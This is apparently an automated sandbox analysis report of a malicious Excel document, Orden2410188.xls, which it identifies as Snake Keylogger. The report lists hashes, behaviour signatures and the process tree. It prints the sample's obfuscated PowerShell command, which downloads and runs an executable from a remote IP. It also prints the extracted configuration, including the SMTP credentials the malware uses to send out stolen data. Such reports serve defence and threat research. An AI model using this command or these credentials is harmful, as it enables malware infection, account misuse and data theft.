Analysis
-
max time kernel
122s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03-10-2024 08:19
Static task
static1
Behavioral task
behavioral1
Sample
Orden2410188.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Orden2410188.xls
Resource
win10v2004-20240802-en
General
-
Target
Orden2410188.xls
-
Size
938KB
-
MD5
39e2230ab8f6d983bee40367b44d0d99
-
SHA1
92e81d6b42529bd3171b4541ea252fce6ba3c010
-
SHA256
ed0b1f5749e23d2494de9cdeda7aca03c44690e22dfbd2f4b5f96baa73986406
-
SHA512
2d9e2060a4251c50e3d32896d71025fc57c2e588d5cbd88ce0c9ba52287f4e40d4775f528958032f7323c3f02d3a0e9e39872e5427b5ed3e9dbbfcd8234ba90c
-
SSDEEP
12288:UmzHJEjwWYSRD3DERnLRmF8Dl3PT7uZNPK+N4Uu/UbH0ilKLdcoCYd8Eojy1f9w:ncwHSRbARM8B3l+iv/UbUxLdwYLom1V
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.teilecar.com - Port:
587 - Username:
[email protected] - Password:
Manta924porsche=911 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/1892-64-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1892-66-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1892-65-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 2720 mshta.exe 11 2720 mshta.exe 13 2540 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2540 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2344 taskhostw.exe -
Loads dropped DLL 1 IoCs
pid Process 2540 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000600000001961f-57.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2344 set thread context of 1892 2344 taskhostw.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2112 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2540 powershell.exe 2540 powershell.exe 2540 powershell.exe 1892 RegSvcs.exe 1892 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2344 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2540 powershell.exe Token: SeDebugPrivilege 1892 RegSvcs.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2112 EXCEL.EXE 2112 EXCEL.EXE 2112 EXCEL.EXE 2112 EXCEL.EXE 2112 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2720 wrote to memory of 2452 2720 mshta.exe 32 PID 2720 wrote to memory of 2452 2720 mshta.exe 32 PID 2720 wrote to memory of 2452 2720 mshta.exe 32 PID 2720 wrote to memory of 2452 2720 mshta.exe 32 PID 2452 wrote to memory of 2540 2452 cmd.exe 34 PID 2452 wrote to memory of 2540 2452 cmd.exe 34 PID 2452 wrote to memory of 2540 2452 cmd.exe 34 PID 2452 wrote to memory of 2540 2452 cmd.exe 34 PID 2540 wrote to memory of 2260 2540 powershell.exe 35 PID 2540 wrote to memory of 2260 2540 powershell.exe 35 PID 2540 wrote to memory of 2260 2540 powershell.exe 35 PID 2540 wrote to memory of 2260 2540 powershell.exe 35 PID 2260 wrote to memory of 1096 2260 csc.exe 36 PID 2260 wrote to memory of 1096 2260 csc.exe 36 PID 2260 wrote to memory of 1096 2260 csc.exe 36 PID 2260 wrote to memory of 1096 2260 csc.exe 36 PID 2540 wrote to memory of 2344 2540 powershell.exe 39 PID 2540 wrote to memory of 2344 2540 powershell.exe 39 PID 2540 wrote to memory of 2344 2540 powershell.exe 39 PID 2540 wrote to memory of 2344 2540 powershell.exe 39 PID 2344 wrote to memory of 1892 2344 taskhostw.exe 40 PID 2344 wrote to memory of 1892 2344 taskhostw.exe 40 PID 2344 wrote to memory of 1892 2344 taskhostw.exe 40 PID 2344 wrote to memory of 1892 2344 taskhostw.exe 40 PID 2344 wrote to memory of 1892 2344 taskhostw.exe 40 PID 2344 wrote to memory of 1892 2344 taskhostw.exe 40 PID 2344 wrote to memory of 1892 2344 taskhostw.exe 40 PID 2344 wrote to memory of 1892 2344 taskhostw.exe 40 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Orden2410188.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2112
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PoweRsHElL -EX bYpASs -nOp -W 1 -C DEvICECReDENTiaLDEPlOyMENt.eXE ; IEX($(IEx('[sySTEM.TEXt.enCoding]'+[cHaR]0X3a+[cHAR]58+'UTF8.GetsTRiNG([SyStem.ConVERt]'+[CHaR]58+[cHaR]0x3A+'FrOMBaSE64STriNG('+[cHAr]34+'JGo0Wk9GICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFckRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdsdm1vRndaWSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc2tJd2FtLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNoYmNnUUd5c1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxYVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHYWp0R0RieE5qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiblhjTm5QandrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFa21xICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqNFpPRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvMjMwL3Rhc2tob3N0dy5leGUiLCIkZU5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSVC1TTEVlUCgzKTtzdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[CHAr]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoweRsHElL -EX bYpASs -nOp -W 1 -C DEvICECReDENTiaLDEPlOyMENt.eXE ; IEX($(IEx('[sySTEM.TEXt.enCoding]'+[cHaR]0X3a+[cHAR]58+'UTF8.GetsTRiNG([SyStem.ConVERt]'+[CHaR]58+[cHaR]0x3A+'FrOMBaSE64STriNG('+[cHAr]34+'JGo0Wk9GICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFckRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdsdm1vRndaWSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc2tJd2FtLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNoYmNnUUd5c1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxYVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHYWp0R0RieE5qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiblhjTm5QandrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFa21xICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqNFpPRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvMjMwL3Rhc2tob3N0dy5leGUiLCIkZU5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSVC1TTEVlUCgzKTtzdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[CHAr]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4nrz21-h.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC591.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC590.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:1096
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1892
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD59352f237438f6804fa75a48d204fece8
SHA19ff1c18479696adbfb058e56ad6f5292040612a9
SHA25612cbe4eda50ba72389332d61e425e7b26926ebdb763e6a02c0ecfa8db4524847
SHA512aba6cacf3ce5fd4f69fd58cd22b826412fae74eb670d08dc21e46eab7aab09de5b0243ff21118492d11b797176d74ebefc898d57065d94b29310ac58295fd2c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD543e102c4083309fc67743d588aa31426
SHA1d0f71f0770d19ee26b5fbee8788613f7ad6f5a58
SHA25669c3b43790e4abd4cfbc3583048fa90c949f257bf606d5aeb8a274fe1aba986e
SHA51219c2d9116710b4da75cb68a4107ecfdbf5c248430b1a9041277c9c8276d8876e5f8b7d433486e4f0054d45cb3acb5827dea04df6e67d10d5949b043b404a30eb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\Ienetbooksweetupdation[1].hta
Filesize8KB
MD5e8b6b8f66f1568524c963ee107abf9c7
SHA1aaf3e605b150c22d8431ffcfc30bae044ea201c7
SHA2564eed8d0dfe860288fff6017d8b43c5e3c7d73a4df00d467ee2f9e778b7e197d0
SHA512544008c3d03e014df07d4b31dba48d1fd6d822993bd8b8167ec2ebe43f739f8fc31fb1a512777e19da9dd55557a03515143c5caa3274a2e2e8c505d166dad9ee
-
Filesize
3KB
MD535112563bd2e6c6387f5012bc23a189e
SHA1685f61bd78ae5a6dfd32b7d26a572e33ad507ca4
SHA256794b9564834e84dcb3f22eafbdacbc1ac2d4d9daae679c93ac7f8c0edd8e08b6
SHA512b7769d190585ecf1aef2e3d7e0822de6b27a65afee9425c3e7ed07b7918299c2c6f2da103137da6e072c97c44a06ad85dd1c8386189bccdf4736006ccedaa9ba
-
Filesize
7KB
MD56705fbb98963b7378028fd12ea4de502
SHA165f88e818cde51a53fb0282eb7d9a556d5beff63
SHA256ab15aea494d6608e274be8a1e56ca7009d4f6366da8a7a79a070c60d6db88c52
SHA512d45062270ab7ee65134e236f0d0497c35d3e3a86aa5e4143a4765f7f45089598ba13eb7523585f01b7d038e02937dcab05693b11830a1d6b9470b5cde88464cd
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD510cddabea00caac82199aa3cce559482
SHA17e648a6029122d09a8dbbe81790c2c53ded6be43
SHA2563f59e07a32ac0f746e2eee018636f35d5a4f9b776d588d3a2665bc996939c956
SHA5126d1848047faeaec3c3b712a2fdb280e9e648c9bd317d55887bf454a2b76bd6834522fba903762d26598917675248eb6baffe52222435c501d714b8aafd1aec37
-
Filesize
489B
MD566cd8bc31e61e003cddb2ea81c47016a
SHA1b9172635caecd693d1476d08c9cecb5777ea49bb
SHA2560ce2cb15b914d1becfba7f1eed7a96e44610e5b70a8d4a9568ed117d6c3a73dd
SHA5126dd379fff538ecec3814b2bf5ffb2d3e8d1f5e8da9f79b416cd2ac81b916633122565cb9ce89f3bcbb1acb1da0269ae2977fdd515f74f9ffc8dbcae15a0a15e4
-
Filesize
309B
MD5b02d2bf0bf5862d8d66bfdd23d47275e
SHA1fbbb1707720095950733b13fbd309dba6eb58f98
SHA25678535d44c9b080742f0c2f642cc916a6624640ab06667245018812da0c7c357d
SHA512d67b085a710390808bc528acaf882a6637bb7af76be99902000fefe91f0c65a546a0d804f33d17ffed9dd10f625a543bc0b393a5a82513df526d264ec543056b
-
Filesize
652B
MD504745d2fdb54593f1c48bc63cc86c68a
SHA16096477e5b622e8a52b3afcb6305802499b1399a
SHA256b9416c78d3b5d8bbb37e552cf566aeaf39ee07f302cc4d9761f9fcba1344cfd9
SHA512e7cf3ccb5cafc79218bdc6d7e7cc6281d2e3846f4094af99b252d062a0cfaa622e1e41419eda867190cc10b06199c4a90f2b268f9302f659d64940bb0f4f18b8
-
Filesize
934KB
MD5d515411b9a3c0d9fb13b9c6a928a7fd0
SHA1f940a7302ac76567c15efb1a15d789b42224aac3
SHA2567b2fcffe77e320517c511f5a3700d8545712475aeb4dc04088537fa8456fec77
SHA512447a5ab235672a2d067e5792260aa5b978720f8d67ac80bd875e74d7032cb496e3b0463f3c3870bd87d975cddf7f750df35a9ea7aa8aa65f1bd1590d3305c9d6